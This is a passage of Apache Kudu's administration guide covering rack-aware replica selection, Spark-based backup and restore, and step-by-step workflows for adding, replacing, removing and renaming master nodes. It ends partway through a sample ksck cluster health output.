tablet rebalancing tool on a rack-aware cluster>>\nfor more information.\n\nThe third and final element of Kudu's rack awareness feature is the use of\nclient locations to find \"nearby\" servers. As mentioned, the masters also\nassign a location to clients when they connect to the cluster. The client\n(whether Java, {cpp}, or Python) uses its own location and the locations of\ntablet servers in the cluster to prefer \"nearby\" replicas when scanning in\n`CLOSEST_REPLICA` mode. Clients choose replicas to scan in the following order:\n\n. Scan a replica on a tablet server on the same host, if there is one.\n. Scan a replica on a tablet server in the same location, if there is one.\n. Scan some replica.\n\nFor example, using the cluster setup described above, if a client on the same\nhost as tablet server `A` scans a tablet with replicas on tablet servers\n`A`, `C`, and `E` in `CLOSEST_REPLICA` mode, it will choose to scan from the\nreplica on `A`, since the client and the replica on `A` are on the same host.\nIf the client scans a tablet with replicas on tablet servers `B`, `C`, and `E`,\nit will choose to scan from the replica on `B`, since it is in the same\nlocation as the client, `\/L0`. If there are multiple replicas meeting a\ncriterion, one is chosen arbitrarily.\n\n[[backup]]\n== Backup and Restore\n\n[[logical_backup]]\n=== Logical backup and restore\n\nAs of Kudu 1.10.0, Kudu supports both full and incremental table backups via a\njob implemented using Apache Spark. Additionally it supports restoring tables\nfrom full and incremental backups via a restore job implemented using Apache Spark.\n\nGiven the Kudu backup and restore jobs use Apache Spark, ensure Apache Spark\nis installed in your environment following the\nlink:https:\/\/spark.apache.org\/docs\/latest\/#downloading[Spark documentation].\nAdditionally review the Apache Spark documentation for\nlink:https:\/\/spark.apache.org\/docs\/latest\/submitting-applications.html[Submitting Applications].\n\n==== Backing up tables\n\nTo backup one or more Kudu tables the `KuduBackup` Spark job can be used.\nThe first time the job is run for a table, a full backup will be run.\nAdditional runs will perform incremental backups which will only contain the\nrows that have changed since the initial full backup. A new set of full\nbackups can be forced at anytime by passing the `--forceFull` flag to the\nbackup job.\n\nThe common flags that will be used when taking a backup are:\n\n* `--rootPath`: The root path to output backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: localhost\n* `<table>...`: A list of tables to be backed up.\n\nNote: You can see the full list of Job options at anytime by passing the `--help` flag.\n\nBelow is a full example of a `KuduBackup` job execution which will backup the tables\n`foo` and `bar` to the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduBackup kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Restoring tables from Backups\n\nTo restore one or more Kudu tables, the `KuduRestore` Spark job can be used.\nFor each backed up table, the `KuduRestore` job will restore the full backup\nand each associated incremental backup until the full table state is restored.\nRestoring the full series of full and incremental backups is possible because\nthe backups are linked via the `from_ms` and `to_ms` fields in the backup metadata.\nBy default the restore job will create tables with the same name as the table\nthat was backed up. If you want to side-load the tables without affecting the\nexisting tables, you can pass `--tableSuffix` to append a suffix to each\nrestored table.\n\nThe common flags that will be used when restoring are:\n\n* `--rootPath`: The root path to the backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: `localhost`\n* `--createTables`: If set to `true`, the restore process creates the tables.\n Set to `false` if the target tables already exist. Default: `true`.\n* `--tableSuffix`: If set, the suffix to add to the restored table names.\n Only used when `createTables` is `true`.\n* `--timestampMs`: A UNIX timestamp in milliseconds that defines the latest time\n to use when selecting restore candidates. Default: `System.currentTimeMillis()`\n* `<table>...`: A list of tables to restore.\n\nNote: You can see the full list of job options at anytime by passing the `--help` flag.\n\nBelow is a full example of a `KuduRestore` job execution which will restore the tables\n`foo` and `bar` from the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduRestore kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Backup tools\n\nAn additional `backup-tools` jar is available to provide some backup exploration and\ngarbage collection capabilities. This jar does not use Spark directly, but instead\nonly requires the Hadoop classpath to run.\n\nCommands:\n\n* `list`: Lists the backups in the rootPath.\n* `clean`: Cleans up old backup data in the rootPath.\n\nNote: You can see the full list of command options at anytime by passing the `--help` flag.\n\nBelow is an example execution which will print the command options:\n\n[source,bash]\n----\njava -cp $(hadoop classpath):kudu-backup-tools-1.10.0.jar org.apache.kudu.backup.KuduBackupCLI --help\n----\n\n[[backup_directory]]\n==== Backup Directory Structure\n\nThe backup directory structure in the `rootPath` is considered an internal detail\nand could change in future versions of Kudu. Additionally the format and content\nof the data and metadata files is meant for the backup and restore process only\nand could change in future versions of Kudu. That said, understanding the structure\nof the backup `rootPath` and how it is used can be useful when working with Kudu backups.\n\nThe backup directory structure in the `rootPath` is as follows:\n\n[source,bash]\n----\n\/<rootPath>\/<tableId>-<tableName>\/<backup-id>\/\n .kudu-metadata.json\n part-*.<format>\n----\n\n* `rootPath`: Can be used to distinguish separate backup groups, jobs, or concerns.\n* `tableId`: The unique internal ID of the table being backed up.\n* `tableName`: The name of the table being backed up.\n** Note: Table names are URL encoded to prevent pathing issues.\n* `backup-id`: A way to uniquely identify\/group the data for a single backup run.\n* `.kudu-metadata.json`: Contains all of the metadata to support recreating the table,\n linking backups by time, and handling data format changes.\n** Written last so that failed backups will not have a metadata file and will not be\n considered at restore time or backup linking time.\n* `part-*.<format>`: The data files containing the tables data.\n** Currently 1 part file per Kudu partition.\n** Incremental backups contain an additional \u201cRowAction\u201d byte column at the end.\n** Currently the only supported format\/suffix is `parquet`\n\n==== Troubleshooting\n\n===== Generating a table list\n\nTo generate a list of tables to backup using the `kudu table list` tool along\nwith `grep` can be useful. Below is an example that will generate a list\nof all tables that start with `my_db.`:\n\n[source,bash]\n----\nkudu table list <master_addresses> | grep \"^my_db\\.*\" | tr '\\n' ' '\n----\n\n*Note*: This list could be saved as a part of you backup process to be used\nat restore time as well.\n\n===== Spark Tuning\n\nIn general the Spark jobs were designed to run with minimal tuning and configuration.\nYou can adjust the number of executors and resources to increase parallelism and performance\nusing Spark's\nlink:https:\/\/spark.apache.org\/docs\/latest\/configuration.html[configuration options].\n\nIf your tables are super wide and your default memory allocation is fairly low, you\nmay see jobs fail. To resolve this increase the Spark executor memory. A conservative\nrule of thumb is 1 GiB per 50 columns.\n\nIf your Spark resources drastically outscale the Kudu cluster you may want to limit the\nnumber of concurrent tasks allowed to run on restore.\n\n===== Backups on Kudu 1.9 and earlier\n\nIf your Kudu cluster is version 1.9 or earlier you can still use the backup tool\nintroduced in Kudu 1.10 to backup your tables. However, because the incremental\nbackup feature requires server side changes, you are limited to full backups only.\nThe process to backup tables is the same as documented above, but you will need to\ndownload and use the kudu-backup jar from a Kudu 1.10+ release. Before running\nthe backup job you should adjust the configuration of your servers by setting\n`--tablet_history_max_age_sec=604800`. This is the new default value in Kudu 1.10+\nto ensure long running backup jobs can complete successfully and consistently.\nAdditionally, when running the backup you need to pass `--forceFull` to disable\nthe incremental backup feature. Now each time the job is run a full backup will be taken.\n\nNOTE: Taking full backups on a regular basis is far more resource and time intensive\nthan incremental backups. It is recommended to upgrade to Kudu 1.10+ soon as possible.\n\n[[physical_backup]]\n=== Physical backups of an entire node\n\nKudu does not yet provide built-in physical backup and restore functionality.\nHowever, it is possible to create a physical backup of a Kudu node (either\ntablet server or master) and restore it later.\n\nWARNING: The node to be backed up must be offline during the procedure, or else\nthe backed up (or restored) data will be inconsistent.\n\nWARNING: Certain aspects of the Kudu node (such as its hostname) are embedded in\nthe on-disk data. As such, it's not yet possible to restore a physical backup of\na node onto another machine.\n\n. Stop all Kudu processes in the cluster. This prevents the tablets on the\n backed up node from being rereplicated elsewhere unnecessarily.\n\n. If creating a backup, make a copy of the WAL, metadata, and data directories\n on each node to be backed up. It is important that this copy preserve all file\n attributes as well as sparseness.\n\n. If restoring from a backup, delete the existing WAL, metadata, and data\n directories, then restore the backup via move or copy. As with creating a\n backup, it is important that the restore preserve all file attributes and\n sparseness.\n\n. Start all Kudu processes in the cluster.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration. It can also be used to migrate from two masters to\nthree, with straightforward modifications. Note that the number of masters must be odd.\n\nWARNING: The workflow is unsafe for adding new masters to an existing configuration that already has\nthree or more masters. Do not use it for that purpose.\n\nWARNING: An even number of masters doesn't provide any benefit over having one fewer masters. This\nguide should always be used for migrating to three masters.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user. The example\ncommands assume the Kudu Unix user is `kudu`, which is typical.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools the workflow also presupposes familiarity with\nit and the vendor's instructions should be used instead as details may differ.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommended; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directories where the master's write-ahead log (WAL) and data live. If\n using Kudu system packages, their default locations are \/var\/lib\/kudu\/master, but they may be\n customized via the `fs_wal_dir` and `fs_data_dirs` configuration parameters. The commands below\n assume that `fs_wal_dir` is \/data\/kudu\/master\/wal and `fs_data_dirs` is \/data\/kudu\/master\/data.\n Your configuration may differ. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures without\nbringing the cluster down for maintenance, and as such, it is highly recommended.\n+\n. If you have Kudu tables that are accessed from Impala, you must update\nthe master addresses in the Apache Hive Metastore (HMS) database.\n* If you set up the DNS aliases, run the following statement in `impala-shell`,\nreplacing `master-1`, `master-2`, and `master-3` with your actual aliases.\n+\n[source,sql]\n----\nALTER TABLE table_name\nSET TBLPROPERTIES\n('kudu.master_addresses' = 'master-1,master-2,master-3');\n----\n+\n* If you do not have DNS aliases set up, see Step #11 in the Performing\nthe migration section for updating HMS.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load\n so it can be collocated with other data services or load-generating processes,\n though not with another Kudu master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc).\n\n[[perform-the-migration]]\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>]\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Modify the value of the `master_addresses` configuration parameter for both existing master and new masters.\n The new value must be a comma-separated list of all of the masters. Each entry is a string of the form `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine.\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n. If you have Kudu tables that are accessed from Impala and you didn't set up\nDNS aliases, update the HMS database manually in the underlying database that\nprovides the storage for HMS.\n* The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'master-1.example.com,master-2.example.com,master-3.example.com'\nWHERE PARAM_KEY = 'kudu.master_addresses' AND PARAM_VALUE = 'old-master';\n----\n+\n* In `impala-shell`, run:\n+\n[source,bash]\n----\nINVALIDATE METADATA;\n----\n\n\n==== Verify the migration was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a potentially brief one if the cluster was set up with DNS aliases.\n\nWARNING: Kudu does not yet support live Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases or if every node in the\ncluster is first shut down. See the <<migrate_to_multi_master,multi-master migration workflow>> for\nmore details on deploying with DNS aliases.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing vendor-specific tools the workflow also presupposes familiarity with\nit and the vendor's instructions should be used instead as details may differ.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. If the deployment was configured without DNS aliases perform the following steps:\n* Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n* Shut down all Kudu tablet server processes in the cluster.\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be collocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration.\n The rest of this workflow will refer to this master as the \"replacement\" master.\n\n. Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note if you've set `fs_data_dirs` to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs dump uuid --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Please note if you've set `fs_data_dirs` to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included. For more information on configuring these directories, see the\n link:configuration.html#directory_configuration[Kudu Configuration docs].\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. Use the following command sequence:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu fs format --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\nWARNING: If your Kudu cluster is secure, in addition to running as the Kudu UNIX user, you must\n authenticate as the Kudu service user prior to running this command.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master and must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ sudo -u kudu kudu local_replica copy_from_remote --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. If the cluster was set up with DNS aliases, reconfigure the DNS alias for the dead master to point\n at the replacement master.\n\n. If the cluster was set up without DNS aliases, perform the following steps:\n* Stop the remaining live masters.\n* Rewrite the Raft configurations on these masters to include the replacement master. See Step 4 of\n <<perform-the-migration, Perform the Migration>> for more details.\n\n. Start the replacement master.\n\n. Restart the remaining masters in the new multi-master deployment. While the masters are shut down,\n there will be an availability outage, but it should last only as long as it takes for the masters\n to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Removing Kudu Masters from a Multi-Master Deployment\n\nIn the event that a multi-master deployment has been overallocated nodes, the following steps should\nbe taken to remove the unwanted masters.\n\nWARNING: In planning the new multi-master configuration, keep in mind that the number of masters\nshould be odd and that three or five node master configurations are recommended.\n\nWARNING: Dropping the number of masters below the number of masters currently needed for a Raft\nmajority can incur data loss. To mitigate this, ensure that the leader master is not removed during\nthis process.\n\n==== Prepare for the removal\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Identify the UUID and RPC address current leader of the multi-master deployment by visiting the\n`\/masters` page of any master's web UI. This master must not be removed during this process; its\nremoval may result in severe data loss.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. If using CM, remove the unwanted Kudu master.\n\n==== Perform the removal\n\n. Rewrite the Raft configuration on the remaining masters to include only the remaining masters. See\nStep 4 of <<perform-the-migration,Perform the Migration>> for more details.\n\n. Remove the data directories and WAL directory on the unwanted masters. This is a precaution to\nensure that they cannot start up again and interfere with the new multi-master deployment.\n\n. Modify the value of the `master_addresses` configuration parameter for the masters of the new\nmulti-master deployment. If migrating to a single-master deployment, the `master_addresses` flag\nshould be omitted entirely.\n\n. Start all of the masters that were not removed.\n\n. Modify the value of the `tserver_master_addrs` configuration parameter for the tablet servers to\nremove any unwanted masters.\n\n. Start all of the tablet servers.\n\n==== Verify the migration was successful\n\nTo verify that all masters are working properly, perform the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line\n tool. See <<ksck>> for more details.\n\n=== Changing the master hostnames\n\nTo prevent long maintenance windows when replacing dead masters, DNS aliases should be used. If the\ncluster was set up without aliases, changing the host names can be done by following the below\nsteps.\n\n==== Prepare for the hostname change\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\nwill be unavailable.\n\n. Note the UUID and RPC address of every master by visiting the `\/masters` page of any master's web\nUI.\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Set up the new hostnames to point to the masters and verify all servers and clients properly\nresolve them.\n\n==== Perform the hostname change\n\n. Rewrite each master\u2019s Raft configuration with the following command, executed on all master hosts:\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_wal_dir> [--fs_data_dirs=<master_data_dir>] 00000000000000000000000000000000 <all_masters>\n----\n\nFor example:\n\n----\n$ sudo -u kudu kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/data\/kudu\/master\/wal --fs_data_dirs=\/data\/kudu\/master\/data 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:new-master-name-1:7051 f5624e05f40649b79a757629a69d061e:new-master-name-2:7051 988d8ac6530f426cbe180be5ba52033d:new-master-name-3:7051\n----\n\n. Change the masters' gflagfile so the `master_addresses` parameter reflects the new hostnames.\n\n. Change the `tserver_master_addrs` parameter in the tablet servers' gflagfiles to the new\nhostnames.\n\n. Start up the masters.\n\n. To verify that all masters are working properly, perform the following sanity checks:\n\n.. Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n.. Run the below command to verify all masters are up and listening. The UUIDs\nshould be the same and belong to the same master as before the hostname change:\n+\n----\n$ sudo -u kudu kudu master list new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051\n----\n\n. Start all of the tablet servers.\n\n. Run a Kudu system check (ksck) on the cluster using the `kudu` command line\ntool. See <<ksck>> for more details. After startup, some tablets may be\nunavailable as it takes some time to initialize all of them.\n\n. If you have Kudu tables that are accessed from Impala, update the HMS\ndatabase manually in the underlying database that provides the storage for HMS.\n\n.. The following is an example SQL statement you should run in the HMS database:\n+\n[source,sql]\n----\nUPDATE TABLE_PARAMS\nSET PARAM_VALUE =\n 'new-master-name-1:7051,new-master-name-2:7051,new-master-name-3:7051'\nWHERE PARAM_KEY = 'kudu.master_addresses'\nAND PARAM_VALUE = 'master-1:7051,master-2:7051,master-3:7051';\n----\n+\n.. In `impala-shell`, run:\n+\n[source,bash]\n----\nINVALIDATE METADATA;\n----\n+\n.. Verify updating the metadata worked by running a simple `SELECT` query on a\nKudu-backed Impala table.\n\n[[adding_tablet_servers]]\n=== Best Practices When Adding New Tablet Servers\n\nA common workflow when administering a Kudu cluster is adding additional tablet\nserver instances, in an effort to increase storage capacity, decrease load or\nutilization on individual hosts, increase compute power, etc.\n\nBy default, any newly added tablet servers will not be utilized immediately\nafter their addition to the cluster. Instead, newly added tablet servers will\nonly be utilized when new tablets are created or when existing tablets need to\nbe replicated, which can lead to imbalanced nodes. It's recommended to run\nthe rebalancer CLI tool just after adding a new tablet server into the cluster,\nas described in the enumerated steps below.\n\nAvoid placing multiple tablet servers on a single node. Doing so\nnullifies the point of increasing the overall storage capacity of a Kudu\ncluster and increases the likelihood of tablet unavailability when a single\nnode fails (the latter drawback is not applicable if the cluster is properly\nconfigured to use the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rack_awareness[location\nawareness] feature).\n\nTo add additional tablet servers to an existing cluster, the\nfollowing steps can be taken to ensure tablet replicas are uniformly\ndistributed across the cluster:\n\n1. Ensure that Kudu is installed on the new machines being added to the\ncluster, and that the new instances have been\nlink:https:\/\/kudu.apache.org\/docs\/configuration.html#_configuring_tablet_servers[\ncorrectly configured] to point to the pre-existing cluster. Then, start up\nthe new tablet server instances.\n2. Verify that the new instances check in with the Kudu Master(s)\nsuccessfully. A quick method for verifying they've successfully checked in\nwith the existing Master instances is to view the Kudu Master WebUI,\nspecifically the `\/tablet-servers` section, and validate that the newly\nadded instances are registered, and heartbeating.\n3. Once the tablet server(s) are successfully online and healthy, follow\nthe steps to run the\nlink:https:\/\/kudu.apache.org\/docs\/administration.html#rebalancer_tool[\nrebalancing tool] which will spread existing tablet replicas to the newly added\ntablet servers.\n4. After the rebalancer tool has completed, or even during its execution,\nyou can check on the health of the cluster using the `ksck` command-line utility\n(see <<ksck>> for more details).\n\n[[ksck]]\n=== Checking Cluster Health with `ksck`\n\nThe `kudu` CLI includes a tool named `ksck` that can be used for gathering\ninformation about the state of a Kudu cluster, including checking its health.\n`ksck` will identify issues such as under-replicated tablets, unreachable\ntablet servers, or tablets without a leader.\n\n`ksck` should be run from the command line as the Kudu admin user, and requires\nthe full list of master addresses to be specified:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nTo see a full list of the options available with `ksck`, use the `--help` flag.\nIf the cluster is healthy, `ksck` will print information about the cluster, a\nsuccess message, and return a zero (success) exit status.\n\n----\nMaster Summary\n UUID | Address | Status\n----------------------------------+-----------------------+---------\n a811c07b99394df799e6650e7310f282 | master-01.example.com | HEALTHY\n b579355eeeea446e998606bcb7e87844 | master-02.example.com | HEALTHY\n cfdcc8592711485fad32ec4eea4fbfcd | master-02.example.com | HEALTHY\n\nTablet Server Summary\n UUID | Address | 